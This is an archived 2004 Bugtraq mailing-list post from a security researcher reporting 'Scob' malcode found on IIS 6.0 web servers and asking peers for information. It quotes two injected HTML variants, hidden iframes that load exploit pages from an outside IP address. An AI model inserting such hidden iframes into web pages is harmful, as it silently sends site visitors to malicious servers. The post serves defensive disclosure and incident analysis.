lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 7 Jul 2004 11:21:12 -0700
From: "Hubbard, Dan" <dhubbard@...sense.com>
To: <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>, <bugtraq@...urityfocus.com>
Subject: Scob variant using IIS 6.0 or just upgrades ?


Our mining processes have uncovered more than 100 additional sites that
are appear to have been breached and used as part of the "Scob" malcode.
Unlike the other sites discovered these sites are NOT running IIS 5.0
and appear as though they are not using the IIS "footer" vulnerability.
There are two variants of jscript that appear to be using IE Iframe
vulnerabilities that they appear to be exploiting on the client side,
however we cannot tell how the servers have been compromised. This maybe
echo'd information, however I have not seen any IIS 6.0 information
posted anywhere. 

Current theory is that these machines were compromised as IIS 5.0 and
then upgraded but not cleaned.

* all pages are infected with malcode on sites
* 96 out of 100 of the site are running HTTPS also.
* all sites are running IIS 6.0 not 5.0 

These are two variants of the HTML. Both appear at the bottom of the
HTML:

Variant 1
--------------

<script language="JavaScript"><!--
</script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\"
width=\"1\" scrolling=\"no\"
frameborder=\"no\"/>");sc088("trk716","4");}}// --></script>


Variant 2
--------------

<iframe width=0 height=0 src="http://217.107.218.147/fed.html"></iframe>

**Does anyone else have information as to what the URL's outlined above
contained and/or any information about compromised IIS 6.0 machines ?**

**Perhaps these machines have simply been upgraded and the malcode was
not "cleaned" off them ? **



_______________________________
Dan Hubbard
Security & Technology Research
Websense, Inc.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ